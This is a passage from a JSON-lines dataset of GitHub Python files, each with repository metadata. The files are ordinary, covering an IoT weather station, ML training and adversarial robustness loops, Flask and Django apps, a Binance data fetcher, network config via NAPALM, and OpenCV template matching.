IO...')\nstation_group = io.get_group('weatherstation')\nfeed_list = station_group['feeds']\naltitude_feed = feed_list[0]\neco2_feed = feed_list[1]\nhumidity_feed = feed_list[2]\npressure_feed = feed_list[3]\ntemperature_feed = feed_list[4]\ntvoc_feed = feed_list[5]\nuv_index_feed = feed_list[6]\nwind_speed_feed = feed_list[7]\n\ndef adc_to_wind_speed(val):\n \"\"\"Returns anemometer wind speed, in m/s.\n :param int val: ADC value\n \"\"\"\n voltage_val = val / 65535 * 3.3\n return map_range(voltage_val, 0.4, 2, 0, 32.4)\n\ndef send_to_io():\n # handle sending sensor data to Adafruit IO\n io.send_data(uv_index_feed['key'], uv_index)\n io.send_data(wind_speed_feed['key'], wind_speed)\n io.send_data(temperature_feed['key'], bme280_data[0])\n io.send_data(humidity_feed['key'], bme280_data[1])\n io.send_data(pressure_feed['key'], bme280_data[2])\n io.send_data(altitude_feed['key'], bme280_data[3])\n io.send_data(eco2_feed['key'], sgp_data[0])\n io.send_data(tvoc_feed['key'], sgp_data[1])\n\nwhile True:\n print('obtaining sensor data...')\n # Get uv index from veml6075\n uv_index = veml.uv_index\n # Get eco2, tvoc from sgp30\n eCO2, TVOC = sgp30.iaq_measure()\n sgp_data = [eCO2, TVOC]\n # Store bme280 data as a list\n bme280_data = [bme280.temperature, bme280.humidity,\n bme280.pressure, bme280.altitude]\n # Get wind speed\n wind_speed = adc_to_wind_speed(adc.value)\n # Display sensor data on PyPortal using the gfx helper\n print('displaying sensor data...')\n gfx.display_data(uv_index, bme280_data,\n sgp_data, wind_speed)\n print('sensor data displayed!')\n try:\n try:\n print('Sending data to Adafruit IO...')\n gfx.display_io_status('Sending data to IO...')\n send_to_io()\n gfx.display_io_status('Data Sent!')\n print('Data sent!')\n except AdafruitIO_RequestError as e:\n raise AdafruitIO_RequestError('IO Error: ', e)\n except (ValueError, RuntimeError, ConnectionError, OSError) as e:\n print(\"Failed to get data, retrying\\n\", e)\n wifi.reset()\n continue\n time.sleep(PYPORTAL_REFRESH)\n","repo_name":"adafruit/Adafruit_Learning_System_Guides","sub_path":"pyportal_weather_station/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":4366,"program_lang":"python","lang":"en","doc_type":"code","stars":913,"dataset":"github-code","pt":"5"} +{"seq_id":"36073560164","text":"\nimport asyncio\nimport logging\nfrom dataclasses import asdict\nfrom typing import TYPE_CHECKING, Any\n\nimport socketio\nfrom dacite import from_dict\nfrom fastapi.encoders import jsonable_encoder\n\nfrom ..data_classes import TrainingOut\nfrom ..data_classes.socket_response import SocketResponse\n\nif TYPE_CHECKING:\n from .trainer_logic import TrainerLogic\n\n\nasync def try_sync_model(trainer: 'TrainerLogic', trainer_node_uuid: str, sio_client: socketio.AsyncClient):\n try:\n model = trainer.get_new_model()\n except Exception as exc:\n logging.exception('error while getting new model')\n raise Exception(f'Could not get new model: {str(exc)}') from exc\n logging.debug(f'new model {model}')\n\n if model:\n response = await sync_model(trainer, trainer_node_uuid, sio_client, model)\n\n if not response.success:\n error_msg = f'Error for update_training: Response from loop was : {asdict(response)}'\n logging.error(error_msg)\n raise Exception(error_msg)\n\n\nasync def sync_model(trainer, trainer_node_uuid, sio_client, model):\n current_training = trainer.training\n new_training = TrainingOut(\n trainer_id=trainer_node_uuid,\n confusion_matrix=model.confusion_matrix,\n train_image_count=current_training.data.train_image_count(),\n test_image_count=current_training.data.test_image_count(),\n hyperparameters=trainer.hyperparameters)\n\n await asyncio.sleep(0.1) # NOTE needed for tests.\n\n result = await sio_client.call('update_training', (current_training.context.organization, current_training.context.project, jsonable_encoder(new_training)))\n response = from_dict(data_class=SocketResponse, data=result)\n\n if response.success:\n logging.info(f'successfully updated training {asdict(new_training)}')\n trainer.on_model_published(model)\n return response\n","repo_name":"zauberzeug/learning_loop_node","sub_path":"learning_loop_node/trainer/training_syncronizer.py","file_name":"training_syncronizer.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"32193628001","text":"#\n# Given a rows x cols screen and a sentence represented as a list of strings, \n# return the number of times the given sentence can be fitted on the screen.\n# The order of words in the sentence must remain unchanged, \n# and a word cannot be split into two lines. A single space must separate two consecutive words in a line.\n\n\n# 359. Logger Rate Limiter\n# Runtime: 32 ms, faster than 95.79% of Python3 online submissions for Bulls and Cows.\n# Memory Usage: 14.3 MB, less than 31.99% of Python3 online submissions for Bulls and Cows.\n\nclass Solution1 :\n from collections import Counter\n def getHint(self, secret: str, guess: str) -> str:\n cows = bulls = 0 \n for i in range(len(secret)) :\n if guess[i] == secret[i]:\n bulls += 1 \n secret_cnt = Counter(secret)\n guess_cnt = Counter(guess)\n guess_cnt_keys = guess_cnt.keys()\n for key in secret_cnt.keys():\n if key in guess_cnt_keys :\n cows += min(guess_cnt[key], secret_cnt[key])\n \n cows -= bulls \n return \"{}A{}B\".format(bulls, cows)\n","repo_name":"sandeulsandeul/programmers_for_codingTest","sub_path":"leetcode/Sentence Screen Fitting.py","file_name":"Sentence Screen Fitting.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25159019856","text":"# write a propgram that will sensor the word in another file with ######\n\nfrom os import replace\nwords = [\"Donkey\", \"Mad\", \"ass\"]\n\nwith open (\"sample.txt\", \"r\") as f:\n content = f.read() # file content is stored in content variable\n\nfor word in words:\n content = content.replace(word, \"@#$%^&\") # replace function used to replace the donkey work with sensor\n\nwith open (\"sample.txt\", \"w\") as f:\n f.write(content) #write function used to replace the words \n\n","repo_name":"sushan2556/all-programs","sub_path":"sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"10854769913","text":"from pygame import Rect\n\n\nclass Frame(object):\n def __init__(self, col: Rect, src: Rect, delay: int):\n self.collision: Rect = col\n self.src: Rect = src\n self.delay = delay\n\n\nclass Action(object):\n def __init__(self, frames: list):\n self.tick: int = 0\n self.index: int = 0\n self.frames: list = frames\n\n def next_frame(self) -> Frame:\n frame: Frame = self.frames[self.index]\n if self.tick > frame.delay:\n self.tick = 0\n self.index += 1\n if self.index >= len(self.frames):\n self.index = len(self.frames) - 1\n self.tick += 1\n return frame\n\n def reset(self) -> None:\n self.tick = 0\n self.index = 0\n\n def is_completed(self) -> bool:\n return self.index == (len(self.frames) - 1)\n","repo_name":"akDeveloper/snake-game-clone","sub_path":"action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"22934403307","text":"from flask import Flask\nfrom flask_login import LoginManager\n\nfrom .config import config\nfrom .models import db, User\n\ndef create_app():\n app = Flask(__name__)\n app.config.update(config.to_flask_config())\n\n db.init_app(app)\n with app.app_context():\n db.create_all()\n\n login_manager = LoginManager()\n login_manager.login_view = 'auth.login'\n login_manager.init_app(app)\n\n @login_manager.user_loader\n def load_user(user_id):\n return User.query.get(int(user_id))\n\n from .auth import auth as auth_blueprint\n app.register_blueprint(auth_blueprint)\n\n from .drive import drive as drive_blueprint\n app.register_blueprint(drive_blueprint)\n\n return app","repo_name":"ToniIvars/localdrive-flask","sub_path":"drive/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21700376564","text":"from django.forms.widgets import Input\nfrom django.utils.safestring import mark_safe\nfrom django.forms.widgets import MultiWidget, DateInput, TimeInput\nfrom time import strftime\n\n# Taken from https://github.com/stholmes/django-bootstrap-datetime-widgets/blob/master/widgets.py\nclass BootstrapSplitDateTimeWidget(MultiWidget):\n\n def __init__(self, attrs=None, date_format=None, time_format=None):\n date_class = attrs['date_class']\n time_class = attrs['time_class']\n date_default = attrs['date_default']\n time_default = attrs['time_default']\n del attrs['date_class']\n del attrs['time_class']\n del attrs['date_default']\n del attrs['time_default']\n\n time_attrs = attrs.copy()\n time_attrs['class'] = time_class\n time_attrs['value'] = time_default\n\n date_attrs = attrs.copy()\n date_attrs['class'] = date_class\n date_attrs['value'] = date_default\n\n import sys\n sys.stderr.write(\"time format is %s\"%time_format)\n widgets = (DateInput(attrs=date_attrs, format=date_format), TimeInput(attrs=time_attrs, format=time_format))\n\n super(BootstrapSplitDateTimeWidget, self).__init__(widgets, attrs)\n\n def decompress(self, value):\n if value:\n d = strftime(\"%Y-%m-%d\", value.timetuple())\n hour = strftime(\"%H\", value.timetuple())\n minute = strftime(\"%M\", value.timetuple())\n meridian = strftime(\"%p\", value.timetuple())\n t = (d, hour+\":\"+minute, meridian)\n\n sys.stderr.write(\"time tuple is %s\"%str(t))\n return \n else:\n return (None, None, None)\n\n def format_output(self, rendered_widgets):\n \"\"\"\n Given a list of rendered widgets (as strings), it inserts an HTML\n linebreak between them.\n\n Returns a Unicode string representing the HTML for the whole lot.\n \"\"\"\n return \"Date: %s
    Time: %s\" % (rendered_widgets[0], rendered_widgets[1])\n\n\nclass TimePickerWidget(Input):\n\n input_type = 'text'\n\n def render(self, name, value, attrs=None):\n attrs = {'class': 'timepicker-default input-timepicker'}\n append_text = self.attrs.get('text', '')\n return mark_safe(u'%s%s' % (super(TimePickerWidget, self).render(name, value, attrs), append_text))\n","repo_name":"llovett/obietaxi","sub_path":"obietaxi/taxi/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"26889607146","text":"def counting_sort(arr):\n max_num = max(arr)\n count = [0] * (max_num + 1)\n\n for num in arr:\n count[num] += 1\n\n sorted_arr = []\n for i in range(max_num + 1):\n for j in range(count[i]):\n sorted_arr.append(i)\n\n return sorted_arr\n\n\narr = [10, 100, 3, 1]\n\nprint(counting_sort(arr))","repo_name":"fudoge/BOJ-practice","sub_path":"algorithm/counting_sort.py","file_name":"counting_sort.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7682695011","text":"import click\nimport pandas as pd\nfrom datetime import date, timedelta, datetime\nfrom binance import Client\n\n@click.command()\n@click.option('--num_assets', default=5, help='Enter the number of assets to return',type=int)\n@click.option('--day', default=None, help='Enter the reference date from which data will be retrieved in YYYY-MM-DD format. Otherwise today will be taken.',type=str)\n@click.option('--look_back', default=30, help='Days to look back from refereence date',type=int)\ndef get_binance_data(num_assets, day = None, look_back = 0):\n \"\"\" \n Obtains historic data from a list of assets using Binance's API and stores it on a CSV file under data folder\n \"\"\"\n client = Client()\n info = client.get_all_tickers()\n print(info)\n \n # Time frame\n if day:\n today = datetime.strptime(day, '%Y-%m-%d') - timedelta(days=look_back)\n else:\n today = date.today() - timedelta(days=look_back)\n yearago = today.replace(year = today.year -1).strftime(\"%Y.%m.%d\")\n today = today.strftime(\"%Y.%m.%d\")\n timeframe=\"1d\"\n\n # Main dataframe structure\n df = pd.DataFrame(columns=[\"Asset\",\"Open time\",\"Open\",\"High\",\"Low\",\"Close\",\"Volume\", \"Closing time\",\"Quote asset vol\", \"Num traders\", \"Taker buy base asset vol\", \"Taker buy quote asset vol\",\"To be ignored\"])\n\n # Iterate for each asset\n an = 0\n for tick in info:\n asset = tick[\"symbol\"]\n # We will filter the assets to work with\n if an < num_assets:\n data = client.get_historical_klines(asset, timeframe, yearago, today)\n if len(data) >= 365:\n df_tmp = pd.DataFrame(data, columns=[\"Open time\",\"Open\",\"High\",\"Low\",\"Close\",\"Volume\", \"Closing time\",\"Quote asset vol\", \"Num traders\", \"Taker buy base asset vol\", \"Taker buy quote asset vol\",\"To be ignored\"])\n df_tmp[\"Asset\"] = asset\n df = pd.concat([df, df_tmp])\n an += 1\n else:\n break\n\n # Write to file under data folder \n df.to_csv(\"data/binance_data.csv\")\n\n# Entrypoint\nif __name__ == \"__main__\":\n get_binance_data()","repo_name":"PacktPublishing/Financial-Modeling-using-Quantum-Computing","sub_path":"retrieve_data.py","file_name":"retrieve_data.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"5"} +{"seq_id":"17458975553","text":"\"\"\"\nDescription: Training and testing functions for neural models\n\nfunctions:\n train: Performs a single training epoch (if attack_args is present adversarial training)\n test: Evaluates model by computing accuracy (if attack_args is present adversarial testing)\n\"\"\"\n\nfrom tqdm import tqdm\nfrom apex import amp\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n__all__ = ['adversarial_epoch', 'adversarial_test']\n\n\ndef adversarial_epoch(model, train_loader, optimizer, scheduler=None, adversarial_args=None):\n \"\"\"\n Description: Single epoch,\n if adversarial args are present then adversarial training.\n Input :\n model : Neural Network (torch.nn.Module)\n train_loader : Data loader (torch.utils.data.DataLoader)\n optimizer : Optimizer (torch.nn.optimizer)\n scheduler: Scheduler (Optional) (torch.optim.lr_scheduler.CyclicLR)\n adversarial_args :\n attack: (deepillusion.torchattacks)\n attack_args:\n attack arguments for given attack except \"x\" and \"y_true\"\n Output:\n train_loss : Train loss (float)\n train_accuracy : Train accuracy (float)\n \"\"\"\n\n model.train()\n\n device = model.parameters().__next__().device\n\n train_loss = 0\n train_correct = 0\n for data, target in train_loader:\n\n data, target = data.to(device), target.to(device)\n\n # Adversary\n if adversarial_args and adversarial_args[\"attack\"]:\n adversarial_args[\"attack_args\"][\"net\"] = model\n adversarial_args[\"attack_args\"][\"x\"] = data\n adversarial_args[\"attack_args\"][\"y_true\"] = target\n perturbs = adversarial_args['attack'](**adversarial_args[\"attack_args\"])\n data += perturbs\n\n optimizer.zero_grad()\n output = model(data)\n cross_ent = nn.CrossEntropyLoss()\n loss = cross_ent(output, target)\n with amp.scale_loss(loss, optimizer) as scaled_loss:\n scaled_loss.backward()\n optimizer.step()\n if scheduler:\n scheduler.step()\n\n train_loss += loss.item() * data.size(0)\n pred_adv = output.argmax(dim=1, keepdim=True)\n train_correct += pred_adv.eq(target.view_as(pred_adv)).sum().item()\n\n train_size = len(train_loader.dataset)\n\n return train_loss/train_size, train_correct/train_size\n\n\ndef adversarial_test(model, test_loader, adversarial_args=None, verbose=False):\n \"\"\"\n Description: Evaluate model with test dataset,\n if adversarial args are present then adversarially perturbed test set.\n Input :\n model : Neural Network (torch.nn.Module)\n test_loader : Data loader (torch.utils.data.DataLoader)\n adversarial_args : (dict)\n attack: (deepillusion.torchattacks)\n attack_args: (dict)\n attack arguments for given attack except \"x\" and \"y_true\"\n verbose: Verbosity (Bool)\n Output:\n train_loss : Train loss (float)\n train_accuracy : Train accuracy (float)\n \"\"\"\n\n device = model.parameters().__next__().device\n\n model.eval()\n\n test_loss = 0\n test_correct = 0\n if verbose:\n iter_test_loader = tqdm(\n iterable=test_loader,\n unit=\"batch\",\n leave=False)\n else:\n iter_test_loader = test_loader\n\n for data, target in iter_test_loader:\n\n data, target = data.to(device), target.to(device)\n\n if adversarial_args and adversarial_args[\"attack\"]:\n adversarial_args[\"attack_args\"][\"net\"] = model\n adversarial_args[\"attack_args\"][\"x\"] = data\n adversarial_args[\"attack_args\"][\"y_true\"] = target\n perturbs = adversarial_args['attack'](**adversarial_args[\"attack_args\"])\n data += perturbs\n # breakpoint()\n\n output = model(data)\n\n cross_ent = nn.CrossEntropyLoss()\n test_loss += cross_ent(output, target).item() * data.size(0)\n\n pred = output.argmax(dim=1, keepdim=True)\n test_correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_size = len(test_loader.dataset)\n\n return test_loss/test_size, test_correct/test_size\n","repo_name":"metehancekic/deep-illusion","sub_path":"deepillusion/torchdefenses/amp/_adversarial_train.py","file_name":"_adversarial_train.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"19129067433","text":"from collections import defaultdict\nfrom typing import List\n\n\nclass Solution:\n # O(N) time and space\n def restoreArray(self, adjacentPairs: List[List[int]]) -> List[int]:\n graph = defaultdict(list)\n count = defaultdict(int)\n\n for a, b in adjacentPairs:\n graph[a].append(b)\n graph[b].append(a)\n count[a] += 1\n count[b] += 1\n\n def dfs(cur):\n if cur in visited:\n return\n visited.add(cur)\n res.append(cur)\n for nbr in graph[cur]:\n if nbr not in visited:\n count[nbr] -= 1\n dfs(nbr)\n\n visited = set()\n res = []\n for num in count:\n if count[num] < 2:\n dfs(num)\n return res\n","repo_name":"Semeriuss/Data-Structures-and-Algorithms","sub_path":"squid_game_a2sv/round_2/day_8/1743. restore_array.py","file_name":"1743. restore_array.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"30504525893","text":"from napalm import get_network_driver\nimport json\n\ndriver = get_network_driver('ios')\noptional_args = {'secret': 'cisco'}\nios = driver('10.1.1.10', 'u1', 'cisco', optional_args=optional_args)\nios.open()\nios.load_replace_candidate(filename='r10-config.txt')\ndiff = ios.compare_config()\nprint(diff)\nif len(diff):\n print('applying changes')\n ios.commit_config()\nelse:\n print('no change')\n ios.discard_config()\n\nios.close()","repo_name":"5gnext/python","sub_path":"napalm-config-mgmt.py","file_name":"napalm-config-mgmt.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24835364335","text":"from builtins import object\nclass GnrCustomWebPage(object):\n css_theme = 'textmate'\n \n def main_root(self, root, bpath='', **kwargs):\n self.createCss(root)\n root.data('gnr.windowTite', 'Dtatabase Structure')\n root.dataRemote('_dev.dbstruct', 'app.dbStructure')\n bc = root.borderContainer(height='100%', font_family='monaco')\n self.topPane(bc.contentPane(region='top', _class='tm_top'))\n tc = bc.tabContainer(region='center', margin='6px', background_color='white', font_size='.9em')\n for pkg in list(self.db.packages.values()):\n if pkg['tables']:\n self.packagePane(tc.borderContainer(title=pkg.name,\n datapath='packages.%s' % pkg.name), pkg)\n\n def topPane(self, pane):\n top = pane.div()\n top.div('Genropy', font_size='1.7em', color='white', margin='10px')\n\n def packagePane(self, bc, pkg):\n center = bc.contentPane(region='center', splitter=True, background_color='white')\n for table in list(pkg['tables'].values()):\n center.dataRemote('.tree.%s' % table.name, 'relationExplorer', table=table.fullname, dosort=False)\n center.tree(storepath='.tree', persist=False,\n inspect='shift', #labelAttribute='label',\n _class='fieldsTree',\n hideValues=True,\n margin='6px',\n onDrag=self.onDrag(),\n draggable=True,\n dragClass='draggedItem',\n onChecked=True,\n selected_fieldpath='.selpath',\n getLabelClass=\"\"\"if (!node.attr.fieldpath && node.attr.table){return \"tableTreeNode\"}\n else if(node.attr.relation_path){return \"aliasColumnTreeNode\"}\n else if(node.attr.sql_formula){return \"formulaColumnTreeNode\"}\"\"\",\n getIconClass=\"\"\"if(node.attr.dtype){return \"icnDtype_\"+node.attr.dtype}\n else {return opened?'dijitFolderOpened':'dijitFolderClosed'}\"\"\")\n\n\n def createCss(self, pane):\n pane.css('.tm_top', 'background-color:#801f78;')\n pane.css('#mainWindow', 'background-color:white;')\n pane.css('.tundra .dijitTreeContent', 'padding-top:0;min-height:17px;')\n pane.css('.tundra .dijitTreeExpando', 'height:16px;')\n\n def onDrag(self):\n return \"\"\"var modifiers=dragInfo.modifiers;\n var mode= (modifiers=='Shift') ? 'r.fieldcell':(modifiers=='Meta') ? 'fb.field':''\n var children=treeItem.getValue()\n if(!children){\n var fieldpath=treeItem.attr.fieldpath;\n dragValues['text/plain']=mode?mode+'(\"'+fieldpath+'\")':fieldpath;\n return\n }\n var cb;\n cb=function(n){\n var fieldpath=n.attr.fieldpath\n return ' '+(mode?mode+'(\"'+fieldpath+'\")':fieldpath);\n };\n result=[];\n result.push('')\n children.forEach(function(n){if (n.attr.checked){result.push(cb(n));}},'static');\n result.push('')\n dragValues['text/plain']= result.join(_lf); \n \"\"\"","repo_name":"genropy/genropy_saved","sub_path":"projects/gnrcore/packages/sys/webpages/dbstruct.py","file_name":"dbstruct.py","file_ext":"py","file_size_in_byte":3398,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"5"} +{"seq_id":"23212866536","text":"from django.conf import settings\nfrom django.test import TestCase, override_settings\nfrom django.urls import reverse\n\n\n@override_settings(DEBUG=False)\nclass TestHeartbeats(TestCase):\n def test_heartbeat(self):\n response = self.client.get(\"/__heartbeat__\")\n self.assertEqual(response.status_code, 200)\n\n def test_lbheartbeat(self):\n response = self.client.get(\"/__lbheartbeat__\")\n self.assertEqual(response.status_code, 200)\n\n\nclass TestContextProcessors(TestCase):\n def test_google_analytics_omitted_if_setting_false(self):\n with self.settings(USE_GOOGLE_ANALYTICS=False):\n headers = {settings.OPENIDC_EMAIL_HEADER: \"user@example.com\"}\n response = self.client.get(reverse(\"home\"), **headers)\n self.assertEqual(response.status_code, 200)\n html = response.content.decode(\"utf-8\")\n # Note the 'not'!\n self.assertNotIn(\"www.googletagmanager.com\", html)\n\n def test_google_analytics_included_if_setting_true(self):\n with self.settings(USE_GOOGLE_ANALYTICS=True):\n headers = {settings.OPENIDC_EMAIL_HEADER: \"user@example.com\"}\n response = self.client.get(reverse(\"home\"), **headers)\n self.assertEqual(response.status_code, 200)\n html = response.content.decode(\"utf-8\")\n self.assertIn(\"www.googletagmanager.com\", html)\n","repo_name":"mozilla/experimenter","sub_path":"experimenter/experimenter/base/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"5"} +{"seq_id":"22390108702","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 22 10:14:48 2020\n\n@author: 10094\n\"\"\"\nimport numpy as np\nimport keras\nimport math\nimport matplotlib.pyplot as plt\nimport sklearn.preprocessing as pre\nfrom keras.models import *\nfrom keras.layers import *\nfrom sklearn.metrics import mean_squared_error\nfrom keras.optimizers import SGD ,RMSprop, Adam\nfrom sklearn.cluster import KMeans\nnp.random.seed(0)\n# In[] load data and data process\ndata = np.load('array_sum.npy')\ntrain_num = 50\nerror_ave = []\n# 1打乱数据 预测平均误差为: 0.032979106556479884\n# permutation = np.random.permutation(data.shape[1])\n# data = data[:,permutation]\n\n# 2选取z最大点:预测平均误差为: 3830339094997.4424\ndata = np.sort(data)\ndata = data[:,::-1]\n\n# 3聚类取出各部分数据 预测平均误差为: 83369014864212.34\n# kmeans = KMeans(n_clusters = 5,verbose= 0)\n# data_all = np.zeros(30897).reshape(-1,1)\n\n# for i in range(4):\n# datai=data[i,].reshape(-1,1)\n# # data0 = np.zeros(1).reshape=(1,1)\n\n# kmeans.fit(datai)\n# label_pred = kmeans.labels_\n# x0 = datai[label_pred == 0]\n# x1 = datai[label_pred == 1]\n# x2 = datai[label_pred == 2]\n# x3 = datai[label_pred == 3]\n# x4 = datai[label_pred == 4]\n# data_x = np.vstack((x0[0:10],x1[0:10],x2[0:10],x3[0:10],x4[0:10]))\n# data_y = np.vstack((x0[10:,],x1[10:,],x2[10:,],x3[10:,],x4[10:,]))\n# data_single = np.vstack((data_x,data_y))\n# data_all = np.hstack((data_all,data_single))\n# data = data_all.T\n# data = data[1:5,]\n\n# scaler = pre.StandardScaler().fit(data.reshape(-1,1))\n# scaler_data = scaler.transform(data)\n# data = scaler_data\n# x = data[:,0:train_num]\n# y = data[:,train_num:]\n\nscaler = pre.StandardScaler()\nx = scaler.fit_transform(data[:,0:train_num])\ny = scaler.fit_transform(data[:,train_num:])\n\nfor i in range(4):\n x_train = np.delete(x,i,axis=0)\n x_test = x[i,].reshape(1,-1)\n y_train = np.delete(y,i,axis=0)\n y_test = y[i,].reshape(1,-1)\n\n# x_train = x[0:3,]\n# x_test = x[3,].reshape(1,-1)\n# y_train = y[0:3,]\n# y_test = y[3,].reshape(1,-1)\n \n \n # In[] set value\n out_num = y_test.shape[1]\n hidden_layers = 15\n Epoch = 1000\n Batch_size = 1\n Validation_data = (x_test,y_test)\n \n # In[] build model\n model = Sequential()\n model.add(Dense(hidden_layers, input_shape=(train_num,)))\n model.add(Activation(\"relu\"))\n # model.add(Dense(256,activation='sigmoid'))\n model.add(Dense(out_num))\n model.summary()\n # model.compile(loss=\"mape\",optimizer=OPTIMIZER)\n \n model.compile(loss='mse',optimizer=Adam(lr=0.001,decay=1e-5))\n \n # model.compile(loss='mape', optimizer='SGD')\n # Callbacks = [keras.callbacks.ReduceLROnPlateau(mnitor='val_loss',\n # factor=0.1,patience=5,mode='auto',)]\n \n history = model.fit(x_train, y_train, epochs=Epoch, batch_size=Batch_size,\n # callbacks=Callbacks,\n validation_data=Validation_data)\n loss = history.history['loss']\n mas = history.history['val_loss']\n \n plt.figure(figsize=(12,8))\n plt.plot(loss,linewidth=3)\n plt.plot(mas,linewidth=3)\n plt.legend(('loss','val_loss'))\n plt.show()\n print('loss:',loss[-1])\n \n # 预测\n pre = model.predict(x_test)\n pre = scaler.inverse_transform(pre)\n y_test = scaler.inverse_transform(y_test)\n mse = math.sqrt(mean_squared_error(pre, y_test))\n print('Test MSE: %.3f' % mse)\n \n index = []\n a = abs((y_test-pre)/y_test)\n b = np.isinf(a)\n for i in range(b[0].shape[0]):\n if b[0][i] == True:\n index.append(i)\n \n new_array = np.delete(a[0],index)\n jj=0\n for i in new_array:\n if i>=0.2:\n # print(i)\n jj+=1 \n pj = new_array.sum()/new_array.shape[0]\n print(\"预测绝对值百分比误差大与20的点个数为: %s\" %jj)\n print(\"预测平均误差为: %s\" %pj)\n error_ave.append(pj)","repo_name":"sssssshf/machine-learning","sub_path":"predict_daner/pre.py","file_name":"pre.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70877716633","text":"\"\"\"\nCliente\nGabriel da Silva Carvalho - 0050013382\n\"\"\"\n\nfrom socket import *\ns = socket ()\n\nvalor = input (\"Digite um valor em dolares de sua busca: (ex:'100.00')\")\nmeusbytes = str.encode(str(valor), \"UTF-8\")\n\ns.connect((\"127.0.0.1\", 8752))\ns.send (meusbytes)\n\ndata = s.recv(1024)\nprint(data.decode(\"utf-8\"))\n\ns.close ()","repo_name":"GabrielCarvalho06/Projeto_Thread_API_Servidor_Cliente","sub_path":"av3_cliente.py","file_name":"av3_cliente.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21083067103","text":"# coding=utf-8\nfrom __future__ import unicode_literals\nimport logging\nimport json\nimport os\n\n\nLOG_LEVEL = \"debug\"\nLOG_OUTPUT = 0\n'''log configuration'''\nlevels = {'debug': logging.DEBUG,\n 'info': logging.INFO,\n 'warnging': logging.WARNING,\n 'error': logging.ERROR,\n 'critical': logging.CRITICAL}\n\nform = '[%(asctime)s | %(filename)s, %(funcName)s, '\nform += 'line %(lineno)d | %(levelname)s] %(message)s'\nformatter = logging.Formatter(form)\nlogging.getLogger('hens').setLevel(levels[\"debug\"])\n\nif LOG_OUTPUT == 0:\n ch = logging.StreamHandler()\n ch.setLevel(levels[LOG_LEVEL])\n ch.setFormatter(formatter)\n logging.getLogger('hens').addHandler(ch)\n\nif LOG_OUTPUT == 1:\n path = os.getcwd()\n fh = logging.FileHandler(os.path.join(path, \"log\", \"logfile.log\"))\n fh.setLevel(levels[LOG_LEVEL])\n fh.setFormatter(formatter)\n logging.getLogger('hen').addHandler(fh)\n\n\nclass Util(object):\n\n logger = logging.getLogger(\"hens\")\n\n def __init__(self):\n pass\n\n @staticmethod\n def read_json(filename):\n with open(filename, \"rb\") as r:\n return json.load(r)\n\n @staticmethod\n def write_json(filename, data):\n with open(filename, \"wb\") as w:\n json.dump(data, w)\n","repo_name":"PengRich/hens_old","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"5552430115","text":"import cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n# Template Matching is a method for searching and finding the location of a template image in a larger image. OpenCV comes with a function cv.matchTemplate() for this purpose. It simply slides the template image over the input image (as in 2D convolution) and compares the template and patch of input image under the template image.\n# It returns a grayscale image, where each pixel denotes how much does the neighbourhood of that pixel match with template.\n#The function slides through image , compares the overlapped patches of size w×h against templ using the specified method and stores the comparison results in result . Here are the formulae for the available comparison methods ( I denotes image, T template, R result ). The summation is done over template and/or the image patch: x′=0...w−1,y′=0...h−1\n# After the function finishes the comparison, the best matches can be found as global minimums (when TM_SQDIFF was used) or maximums (when TM_CCORR or TM_CCOEFF was used) using the minMaxLoc function. In case of a color image, template summation in the numerator and each sum in the denominator is done over all of the channels and separate mean values are used for each channel. That is, the function can take a color template and a color image. The result will still be a single-channel image, which is easier to analyze.\n\n# result = cv.matchTemplate( image, templ, method[, result[, mask]] )\n# result - Map of comparison results. It must be single-channel 32-bit floating-point. If image is W×H and templ is w×h , then result is (W−w+1)×(H−h+1) .\n# method - Parameter specifying the comparison method, see cv::TemplateMatchModes\n# mask -Mask of searched template. It must have the same datatype and size with templ. It is not set by default. Currently, only the TM_SQDIFF and TM_CCORR_NORMED methods are supported. \n\ndef MatchingTemplate(method):\n\n\timg2 = img.copy()\n\tprint(\"This result is using method\",methods[method])\n\tres = cv.matchTemplate(img2,template,method)\n\tprint(res)\n\n\tmin_val, max_val, min_loc, max_loc = cv.minMaxLoc(res)\n\tcv.normalize( res, 